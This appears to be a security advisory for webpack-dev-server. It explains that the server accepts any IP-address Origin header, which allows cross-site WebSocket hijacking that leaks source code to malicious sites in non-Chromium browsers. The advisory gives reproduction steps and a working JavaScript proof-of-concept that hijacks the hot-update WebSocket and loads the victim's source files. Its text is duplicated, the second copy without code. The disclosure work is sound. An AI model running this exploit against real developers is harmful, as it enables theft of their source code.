Summary
Source code may be stolen when you access a malicious web site with non-Chromium based browser.
Details
The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.
But webpack-dev-server always allows IP address Origin headers.
|
// always allow requests with explicit IPv4 or IPv6-address. |
|
// A note on IPv6 addresses: |
|
// hostHeader will always contain the brackets denoting |
|
// an IPv6-address in URLs, |
|
// these are removed from the hostname in url.parse(), |
|
// so we have the pure IPv6-address in hostname. |
|
// For convenience, always allow localhost (hostname === 'localhost') |
|
// and its subdomains (hostname.endsWith(".localhost")). |
|
// allow hostname of listening address (hostname === this.options.host) |
|
const isValidHostname = |
|
(hostname !== null && ipaddr.IPv4.isValid(hostname)) || |
|
(hostname !== null && ipaddr.IPv6.isValid(hostname)) || |
|
hostname === "localhost" || |
|
(hostname !== null && hostname.endsWith(".localhost")) || |
|
hostname === this.options.host; |
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described in
the article linked from
CVE-2018-14732, the attacker get the source code.
related commit: 72efaab (note that checkHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.
This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.
PoC
- Download reproduction.zip and extract it
- Run
npm i
- Run
npx webpack-dev-server
- Open
http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
- Edit
src/index.js in the extracted directory
- You can see the content of
src/index.js
The script in the POC site is:
window.webpackHotUpdate = (...args) => {
console.log(...args);
for (i in args[1]) {
document.body.innerText = args[1][i].toString() + document.body.innerText
console.log(args[1][i])
}
}
let params = new URLSearchParams(window.location.search);
let target = new URL(params.get('target') || 'http://127.0.0.1:8080');
let file = params.get('file')
let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
let wsPort = target.port;
var currentHash = '';
var currentHash2 = '';
let wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;
ws = new WebSocket(wsTarget);
ws.onmessage = event => {
console.log(event.data);
if (event.data.match('"type":"ok"')) {
s = document.createElement('script');
s.src = `${target}${file}.${currentHash2}.hot-update.js`;
document.body.appendChild(s)
}
r = event.data.match(/"([0-9a-f]{20})"/);
if (r !== null) {
currentHash2 = currentHash;
currentHash = r[1];
console.log(currentHash, currentHash2);
}
}Impact
This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.
sapphi-red Reporter
Summary
Source code may be stolen when you access a malicious web site with non-Chromium based browser.
Details
The
Originheader is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.But webpack-dev-server always allows IP address
Originheaders.webpack-dev-server/lib/Server.js
Lines 3113 to 3127 in 55220a8
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described in the article linked from CVE-2018-14732, the attacker get the source code.
related commit: 72efaab (note that
checkHostfunction was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.
PoC
npm inpx webpack-dev-serverhttp://{ipaddress}/?target=http://localhost:8080&file=mainwith a non-Chromium browser (I used Firefox 134.0.1)src/index.jsin the extracted directorysrc/index.jsThe script in the POC site is:
Impact
This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.